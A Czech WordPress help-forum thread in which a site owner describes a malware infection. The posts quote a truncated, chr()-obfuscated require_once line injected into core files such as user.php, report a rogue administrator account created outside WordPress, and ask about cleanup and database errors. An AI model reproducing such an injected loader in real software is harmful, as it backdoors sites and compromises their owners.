Přehled odpovědí
-
AutorPříspěvky
-
Dobrý den,
malware jsem díky Vám odstranil, ale trápí mě neustálá změna pěti souborů, kterou mi hlásí Worldfence (všechny ostatní pluginy jsem deaktivoval):
wp-includes/user.php, dtto taxonomy, post, load, class-wp – jsou do nich vloženy znaky, např. v user.php (část):
@require_once(“”.chr(47).””.””.””.””.””.”w”.””.””.””.””.””.chr(101).””.””.chr(98).””.””.
/*user.php */function wp_authenticate_cookie($user, $username, $password) {Dále se mi uhnizďuje nevítaný uživatel s administrátorskými právy:
wpupdatestream s adresou support@wpwhitesecurity.com a Worldfence hlásí:
Uživatel admin s uživatelským jménem wpupdatestream byl vytvořen mimo WordPress.
DěkujiDobrý den,
přikládám screenshoty Google Chrome, ze Sucuri. Ve WP byly poničené české znaky, přeinstaloval jsem tedy WP.
Kopie posledních řádků z Wordfence:
[Feb 28 21:32:30] Analyzed 1800 files containing 29.92 MB of data so far
[Feb 28 21:32:33] Analyzed 1900 files containing 33.16 MB of data so far
[Feb 28 21:32:35] Scan can’t continue – stored data not found after a fork. Got type: boolean
[Feb 28 23:56:35] Scheduled Wordfence scan starting at Sunday 28th of February 2016 11:56:35 PM
[Feb 29 00:48:37] Scheduled Wordfence scan starting at Monday 29th of February 2016 12:48:37 AMAttachments:
Dodávám, že zatímco Firefox nic nezobrazuje, G.Chrome stále hlásí stránku napadenou malware (možná stačí jen odhlásit pomocí formuláře?).
Opravil jsem heslo v
wp-config.php
, dostal se do wordpressu, deaktivoval všechny pluginy, nainstaloval a zapnul wordfence, změnil své heslo. Nyní po spuštění stránky nehlásí malware, ale vůbec nic, stránka je prázdná (asi budu muset aktivovat nějaký plugin – ale jaký?). Co jde spustit bez problémů je poddoména. Ve wordfence běží Live Traffic ad. Děkuji za předchozí cenné rady a pokud budete vědět co dál budu vám oběma vděčný.Změnil jsem heslo v
wp-config.php
, ale po mé snaze se přihlásit stále hlásí “Během připojování k databázovému serveru došlo k chybě.”– Potřeboval bych se zřejmě dostat do administrace WP, abych deaktivoval pluginy, ale jak to udělat?
– Jak pročistit FTP? Antivirem pod Windows? (pracuji v OS Ubuntu).
Děkuji.
Dobrý den,
po hlášce o malware na našem webu jsem smazal a poté obnovil obsah přes FTP, změnil hesla FTP, Webu a databáze. I poté Sucuri hlásí prolomení sítě. Po přihlášení/wp-login.php
mi hlásí: “Během připojování k databázovému serveru došlo k chybě” Je to možné díky změně hesla db? Stačí poté, co se dostanu do wordpressu zkontrolovat soubory antivirovým pluginem?
Děkuji za pomoc. -
AutorPříspěvky